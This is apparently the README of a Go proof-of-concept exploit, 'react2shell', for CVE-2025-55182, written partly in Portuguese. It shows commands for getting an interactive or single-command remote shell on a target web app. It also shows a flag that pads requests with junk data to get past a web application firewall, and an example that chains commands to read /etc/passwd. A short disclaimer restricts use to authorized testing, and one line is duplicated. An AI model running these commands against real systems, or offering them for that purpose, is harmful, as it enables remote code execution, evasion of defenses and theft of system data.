
react2shell PoC com Go / CVE-2025-55182
CVE-2025-55182 PoC
# Interactive shell
./react2shell -u http://target:3000
# Single command
./react2shell -u http://target:3000 -c "id"
# WAF bypass (128KB junk data)
./react2shell -u http://target:3000 -waf 128
go build -o react2shell .
| Flag | Descrição |
|---|---|
-u | URL do alvo |
-c | Comando único (opcional) |
-waf | Tamanho do lixo para bypass de WAF em KB (opcional) |
; ou && para encadear comandos: cd /etc && cat passwdApenas para testes de segurança autorizados.
; ou && para encadear comandos: cd /etc && cat passwdApenas para testes de segurança autorizados.